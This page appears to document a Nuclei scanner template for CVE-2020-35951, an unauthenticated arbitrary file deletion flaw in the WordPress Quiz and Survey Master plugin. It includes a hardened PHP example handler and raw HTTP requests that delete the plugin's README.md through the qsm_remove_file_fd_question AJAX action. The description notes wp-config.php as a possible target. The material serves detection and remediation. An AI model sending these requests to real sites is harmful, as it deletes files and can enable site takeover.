Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion
ID: CVE-2020-35951
Severity: critical
Author: princechaddha
Tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech
Description
Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files, such as the wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall WordPress with an instance under their control. This occurred via the qsm_remove_file_fd_question AJAX action, which allowed unauthenticated deletions even though it was only intended for a person to delete their own quiz-answer files.
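The weakness behind this CVE is a file-deletion AJAX action that trusted a client-supplied path and performed no authentication or authorization check (CWE-306). The handler below is an added, hypothetical example of how such an action is hardened in a WordPress plugin: it is not the Quiz and Survey Master plugin's code or its actual fix, and the hook name, nonce action, capability and option names are assumptions.

```php
<?php
// Added example (hypothetical): a hardened WordPress AJAX file-removal handler.
// Not the Quiz and Survey Master plugin's code. The hook name
// 'example_remove_answer_file', the nonce action and the option key are assumptions.

// Register for logged-in users only. No wp_ajax_nopriv_ hook is added, so an
// unauthenticated POST to admin-ajax.php never reaches this handler.
add_action( 'wp_ajax_example_remove_answer_file', 'example_remove_answer_file' );

function example_remove_answer_file() {
    // 1. CSRF protection: the request must carry a nonce issued for this action
    //    (the page that renders the delete button creates it with
    //    wp_create_nonce( 'example_remove_answer_file' )).
    check_ajax_referer( 'example_remove_answer_file', 'nonce' );

    // 2. Authorization: require a capability the plugin grants to quiz owners.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed' ), 403 );
    }

    // 3. Resolve the requested URL to a real path and confine it to the uploads directory.
    $file_url = isset( $_POST['file_url'] ) ? esc_url_raw( wp_unslash( $_POST['file_url'] ) ) : '';
    $uploads  = wp_upload_dir();
    $path     = example_uploads_path_from_url( $file_url, $uploads['baseurl'], $uploads['basedir'] );

    if ( null === $path ) {
        wp_send_json_error( array( 'message' => 'Invalid file' ), 400 );
    }

    // 4. Ownership: only the user who uploaded the answer file (or an admin) may remove it.
    //    Assumption: the plugin records the owner's user ID per file in an option.
    $owner_id = (int) get_option( 'example_answer_file_owner_' . md5( $path ), 0 );
    if ( $owner_id !== get_current_user_id() && ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed' ), 403 );
    }

    if ( ! is_file( $path ) || ! unlink( $path ) ) {
        wp_send_json_error( array( 'message' => 'Could not remove file' ), 500 );
    }

    delete_option( 'example_answer_file_owner_' . md5( $path ) );
    wp_send_json_success( array( 'message' => 'File removed successfully' ) );
}

/**
 * Map a file URL to a filesystem path, or return null unless the path is a
 * regular file inside the uploads base directory.
 */
function example_uploads_path_from_url( $file_url, $base_url, $base_dir ) {
    $base_url = trailingslashit( $base_url );

    // Only URLs under the uploads base URL are acceptable; wp-config.php is not.
    if ( '' === $file_url || 0 !== strpos( $file_url, $base_url ) ) {
        return null;
    }

    // Drop query string and fragment, then decode percent-encoding before resolving,
    // so encoded "../" segments are seen by realpath() and collapsed.
    $relative = substr( $file_url, strlen( $base_url ) );
    $relative = rawurldecode( (string) strtok( $relative, '?#' ) );

    $real_dir = realpath( $base_dir );
    $real     = realpath( trailingslashit( (string) $real_dir ) . $relative );

    // realpath() also follows symlinks, so a link in uploads pointing at
    // wp-config.php resolves outside the base directory and fails this prefix test.
    if ( false === $real_dir || false === $real
        || 0 !== strpos( $real, trailingslashit( $real_dir ) ) ) {
        return null;
    }

    // Directories are never deletable through this action.
    return is_file( $real ) ? $real : null;
}
```

The three checks map directly onto the weakness described above: the missing `wp_ajax_nopriv_` registration and the capability test close the unauthenticated path, the nonce stops a logged-in user from being tricked into deleting a file, and the `realpath()` prefix test is what prevents a `file_url` value from reaching files outside the uploads directory regardless of who calls the action.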
YAML Source
id: CVE-2020-35951

info:
  name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion
  author: princechaddha
  severity: critical
  description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
  impact: |
    This vulnerability can lead to unauthorized deletion of critical files, resulting in data loss or server compromise.
  remediation: |
    Upgrade to the latest version of Wordpress Quiz and Survey Master plugin (7.0.1 or higher) to mitigate this vulnerability.
  reference:
    - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35951
    - https://wpscan.com/vulnerability/10348
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
    cvss-score: 9.9
    cve-id: CVE-2020-35951
    cwe-id: CWE-306
    epss-score: 0.00174
    epss-percentile: 0.54591
    cpe: cpe:2.3:a:expresstech:quiz_and_survey_master:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 4
    vendor: expresstech
    product: quiz_and_survey_master
    framework: wordpress
  tags: cve,cve2020,wordpress,wp-plugin,wpscan,intrusive,expresstech

http:
  - raw:
      - |
        GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92

        ------WebKitFormBoundaryBJ17hSJBjuGrnW92
        Content-Disposition: form-data; name="action"

        qsm_remove_file_fd_question
        ------WebKitFormBoundaryBJ17hSJBjuGrnW92
        Content-Disposition: form-data; name="file_url"

        {{fullpath}}wp-content/plugins/quiz-master-next/README.md
        ------WebKitFormBoundaryBJ17hSJBjuGrnW92--

      - |
        GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')

      - type: word
        part: body
        words:
          - '{"type":"success","message":"File removed successfully"}'

    extractors:
      - type: regex
        name: fullpath
        group: 1
        regex:
          - not found in <b>([/a-z_]+)wp
        internal: true
        part: body
# digest: 490a004630440220316b237e707596a35daeefbb1ca451ac6749037722f63fe87949cbf5ae9786450220102154ee2c1b3c8436c99a5d8766a2268a04d91cd2164474722cad55b7583784:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is run with the Nuclei scanner to detect the vulnerability described above. Note the intrusive tag: the check confirms the flaw by deleting the plugin's own README.md (the fourth request verifies the file is gone), so a positive result changes state on the target; the first two requests fingerprint the plugin and extract the installation's filesystem path from an error message before the deletion is attempted.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-35951.yaml"